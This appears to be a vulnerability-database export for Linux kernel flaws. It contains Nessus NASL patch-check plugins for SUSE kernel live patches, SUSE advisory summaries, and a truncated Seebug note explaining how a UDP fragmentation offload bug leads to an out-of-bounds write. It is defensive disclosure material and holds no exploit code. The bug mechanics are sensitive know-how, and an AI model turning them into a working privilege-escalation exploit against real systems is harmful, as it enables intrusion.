script_cve_id(\"CVE-2017-7533\", \"CVE-2017-7645\", \"CVE-2017-9242\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2102-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_77 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-7533: A bug in inotify code allowed local users\n to escalate privilege (bsc#1050751).\n\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd\n subsystem in the Linux kernel allowed remote attackers\n to cause a denial of service (system crash) via a long\n RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel is too late in\n checking whether an overwrite of an skb data structure\n may occur, which allowed local users to cause a denial\n of service (system crash) via crafted system calls\n (bsc#1042892).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050751\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7533/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7645/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9242/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172102-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1b9ec293\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-1301=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1301=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_77-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_77-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_77-default-3-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_77-xen-3-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T14:26:10", "description": "This update for the Linux Kernel 3.12.61-52_80 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-7533: A bug in inotify code allowed local users\n to escalate privilege (bsc#1050751).\n\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd\n subsystem in the Linux kernel allowed remote attackers\n to cause a denial of service (system crash) via a long\n RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel is too late in\n checking whether an overwrite of an skb data structure\n may occur, which allowed local users to cause a denial\n of service (system crash) via crafted system calls\n (bsc#1042892).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-08-09T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2098-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-7533"], "modified": "2017-08-09T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_80-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_80-xen"], "id": "SUSE_SU-2017-2098-1.NASL", "href": "https://www.tenable.com/plugins/nessus/102316", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2098-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102316);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7533\", \"CVE-2017-7645\", \"CVE-2017-9242\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2098-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_80 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-7533: A bug in inotify code allowed local users\n to escalate privilege (bsc#1050751).\n\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd\n subsystem in the Linux kernel allowed remote attackers\n to cause a denial of service (system crash) via a long\n RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel is too late in\n checking whether an overwrite of an skb data structure\n may occur, which allowed local users to cause a denial\n of service (system crash) via crafted system calls\n (bsc#1042892).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050751\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7533/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7645/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9242/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172098-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ae8565cd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-1300=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1300=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_80-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_80-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_80-default-2-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_80-xen-2-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2017-09-15T01:10:27", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-1000112"], "description": "This update for the Linux Kernel 3.12.61-52_86 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n in the Linux kernel was too late in checking whether an overwrite of an\n skb data structure may occur, which allowed local users to cause a\n denial of service (system crash) via crafted system calls (bsc#1042892).\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux\n kernel allowed remote attackers to cause a denial of service (system\n crash) via a long RPC reply (bsc#1046191).\n\n", "edition": 1, "modified": "2017-09-15T00:09:12", "published": "2017-09-15T00:09:12", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-09/msg00052.html", "id": "SUSE-SU-2017:2475-1", "title": "Security update for Linux Kernel Live Patch 25 for SLE 12 (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-09-15T03:13:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-1000112"], "description": "This update for the Linux Kernel 3.12.61-52_89 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n in the Linux kernel was too late in checking whether an overwrite of an\n skb data structure may occur, which allowed local users to cause a\n denial of service (system crash) via crafted system calls (bsc#1042892).\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux\n kernel allowed remote attackers to cause a denial of service (system\n crash) via a long RPC reply (bsc#1046191).\n\n", "edition": 1, "modified": "2017-09-15T00:10:13", "published": "2017-09-15T00:10:13", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-09/msg00053.html", "id": "SUSE-SU-2017:2476-1", "title": "Security update for Linux Kernel Live Patch 26 for SLE 12 (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-10-19T16:53:31", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15274", "CVE-2017-7645", "CVE-2017-9242", "CVE-2017-1000112"], "description": "This update for the Linux Kernel 3.12.61-52_92 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-15274: security/keys/keyctl.c in the Linux kernel did not\n consider the case of a NULL payload in conjunction with a nonzero length\n value, which allowed local users to cause a denial of service (NULL\n pointer dereference and OOPS) via a crafted add_key or keyctl system\n call (bsc#1045327).\n - CVE-2017-1000112: Updated patch for this issue to be in sync with the\n other livepatches. Description of the issue: Prevent race condition in\n net-packet code that could have been exploited by unprivileged users to\n gain root access (bsc#1052368, bsc#1052311).\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n was too late in checking whether an overwrite of an skb data structure\n may occur, which allowed local users to cause a denial of service\n (system crash) via crafted system calls (bsc#1042892).\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem allowed\n remote attackers to cause a denial of service (system crash) via a long\n RPC reply (bsc#1046191).\n\n", "edition": 1, "modified": "2017-10-19T15:07:21", "published": "2017-10-19T15:07:21", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00032.html", "id": "SUSE-SU-2017:2775-1", "title": "Security update for Linux Kernel Live Patch 27 for SLE 12 (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-09-13T18:59:29", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9242", "CVE-2017-1000112", "CVE-2017-8890"], "description": "This update for the Linux Kernel 3.12.74-60_64_57 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n in the Linux kernel was too late in checking whether an overwrite of an\n skb data structure may occur, which allowed local users to cause a\n denial of service (system crash) via crafted system calls (bsc#1038564,\n bsc#1042892).\n - CVE-2017-8890: The inet_csk_clone_lock function in\n net/ipv4/inet_connection_sock.c in the Linux kernel allowed attackers to\n cause a denial of service (double free) or possibly have unspecified\n other impact by leveraging use of the accept system call (bsc#1038564).\n\n", "edition": 1, "modified": "2017-09-13T17:27:22", "published": "2017-09-13T17:27:22", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-09/msg00037.html", "id": "SUSE-SU-2017:2448-1", "title": "Security update for Linux Kernel Live Patch 20 for SLE 12 SP1 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-13T18:59:29", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9242", "CVE-2017-1000112", "CVE-2017-8890"], "description": "This update for the Linux Kernel 3.12.74-60_64_51 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000112: Prevent a race condition in net-packet code that could\n have been exploited by unprivileged users to gain root access\n (bsc#1052368).\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n in the Linux kernel was too late in checking whether an overwrite of an\n skb data structure may occur, which allowed local users to cause a\n denial of service (system crash) via crafted system calls (bsc#1038564,\n bsc#1042892).\n - CVE-2017-8890: The inet_csk_clone_lock function in\n net/ipv4/inet_connection_sock.c in the Linux kernel allowed attackers to\n cause a denial of service (double free) or possibly have unspecified\n other impact by leveraging use of the accept system call (bsc#1038564).\n\n", "edition": 1, "modified": "2017-09-13T17:26:23", "published": "2017-09-13T17:26:23", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-09/msg00036.html", "id": "SUSE-SU-2017:2447-1", "title": "Security update for Linux Kernel Live Patch 18 for SLE 12 SP1 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-09T15:07:21", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-7533"], "description": "This update for the Linux Kernel 3.12.61-52_80 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-7533: A bug in inotify code allowed local users to escalate\n privilege (bsc#1050751).\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux\n kernel allowed remote attackers to cause a denial of service (system\n crash) via a long RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n in the Linux kernel is too late in checking whether an overwrite of an\n skb data structure may occur, which allowed local users to cause a\n denial of service (system crash) via crafted system calls (bsc#1042892).\n\n", "edition": 1, "modified": "2017-08-08T18:09:40", "published": "2017-08-08T18:09:40", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00026.html", "id": "SUSE-SU-2017:2098-1", "title": "Security update for Linux Kernel Live Patch 23 for SLE 12 (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-08-09T15:07:20", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-7533"], "description": "This update for the Linux Kernel 3.12.61-52_69 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-7533: A bug in inotify code allowed local users to escalate\n privilege (bsc#1050751).\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux\n kernel allowed remote attackers to cause a denial of service (system\n crash) via a long RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n - A SUSE Linux Enterprise specific regression in tearing down network\n namespaces was fixed (bsc#1044878)\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n in the Linux kernel is too late in checking whether an overwrite of an\n skb data structure may occur, which allowed local users to cause a\n denial of service (system crash) via crafted system calls (bsc#1042892).\n\n", "edition": 1, "modified": "2017-08-08T18:15:15", "published": "2017-08-08T18:15:15", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00029.html", "id": "SUSE-SU-2017:2103-1", "title": "Security update for Linux Kernel Live Patch 20 for SLE 12 (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-08-09T15:07:20", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-7533"], "description": "This update for the Linux Kernel 3.12.61-52_77 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-7533: A bug in inotify code allowed local users to escalate\n privilege (bsc#1050751).\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux\n kernel allowed remote attackers to cause a denial of service (system\n crash) via a long RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n in the Linux kernel is too late in checking whether an overwrite of an\n skb data structure may occur, which allowed local users to cause a\n denial of service (system crash) via crafted system calls (bsc#1042892).\n\n", "edition": 1, "modified": "2017-08-08T18:14:05", "published": "2017-08-08T18:14:05", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00028.html", "id": "SUSE-SU-2017:2102-1", "title": "Security update for Linux Kernel Live Patch 22 for SLE 12 (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-10-20T04:51:49", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15274", "CVE-2017-9242", "CVE-2017-1000112", "CVE-2017-8890"], "description": "This update for the Linux Kernel 3.12.74-60_64_60 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-15274: security/keys/keyctl.c in the Linux kernel did not\n consider the case of a NULL payload in conjunction with a nonzero length\n value, which allowed local users to cause a denial of service (NULL\n pointer dereference and OOPS) via a crafted add_key or keyctl system\n call (bsc#1045327).\n - CVE-2017-1000112: Updated patch for this issue to be in sync with the\n other livepatches. Description of the issue: Prevent race condition in\n net-packet code that could have been exploited by unprivileged users to\n gain root access (bsc#1052368, bsc#1052311).\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n was too late in checking whether an overwrite of an skb data structure\n may occur, which allowed local users to cause a denial of service\n (system crash) via crafted system calls (bsc#1042892).\n - CVE-2017-8890: The inet_csk_clone_lock function in\n net/ipv4/inet_connection_sock.c allowed attackers to cause a denial of\n service (double free) or possibly have unspecified other impact by\n leveraging use of the accept system call (bsc#1038564).\n\n", "edition": 1, "modified": "2017-10-20T03:07:40", "published": "2017-10-20T03:07:40", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00047.html", "id": "SUSE-SU-2017:2791-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 21 for SLE 12 SP1 (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-09T15:07:20", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-2636", "CVE-2017-7533"], "description": "This update for the Linux Kernel 3.12.60-52_57 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-7533: A bug in inotify code allowed local users to escalate\n privilege (bsc#1050751).\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux\n kernel allowed remote attackers to cause a denial of service (system\n crash) via a long RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (double free) by setting the HDLC line discipline (bsc#1027575).\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n in the Linux kernel is too late in checking whether an overwrite of an\n skb data structure may occur, which allowed local users to cause a\n denial of service (system crash) via crafted system calls (bsc#1042892).\n\n", "edition": 1, "modified": "2017-08-08T18:10:30", "published": "2017-08-08T18:10:30", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00027.html", "id": "SUSE-SU-2017:2099-1", "title": "Security update for Linux Kernel Live Patch 16 for SLE 12 (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T11:56:28", "description": "### Bug details\r\n\r\nWhen building a UFO packet with MSG_MORE __ip_append_data() calls\r\nip_ufo_append_data() to append. However in between two send() calls,\r\nthe append path can be switched from UFO to non-UFO one, which leads\r\nto a memory corruption.\r\n\r\nIn case UFO packet lengths exceeds MTU, copy = maxfraglen - skb->len\r\nbecomes negative on the non-UFO path and the branch to allocate new\r\nskb is taken. This triggers fragmentation and computation of fraggap =\r\nskb_prev->len - maxfraglen. Fraggap can exceed MTU, causing copy =\r\ndatalen - transhdrlen - fraggap to become negative. Subsequently\r\nskb_copy_and_csum_bits() writes out-of-bounds.\r\n\r\nA similar issue is present in IPv6 code.\r\n\r\nThe bug was introduced in e89e9cf539a2 (\"[IPv4/IPv6]: UFO\r\nScatter-gather approach\") on Oct 18 2005.\r\n\r\nThe fix has been submitted to netdev [1] and should be committed to\r\nmainline and to stable kernels soon. David has also sent an RFC series\r\nto remove UFO completely [2], which should be merged in 4.14.\r\n\r\nIf unprivileged user namespaces are available, this bug can be\r\nexploited to gain root privileges. I'll share the details and the\r\nexploit in a few days.\r\n\r\nThanks!\r\n\r\n### Timeline\r\n\r\n* 2017.08.03 - Bug reported to security () kernel org\r\n* 2017.08.04 - Bug reported to linux-distros@\r\n* 2017.08.10 - Patch submitted to netdev\r\n* 2017.08.10 - Announcement on oss-security@\r\n\r\n### Links\r\n\r\n[1] https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa\r\n\r\n[2] https://www.spinics.net/lists/netdev/msg443815.html", "published": "2017-08-14T00:00:00", "type": "seebug", "title": "Linux kernel: Exploitable memory 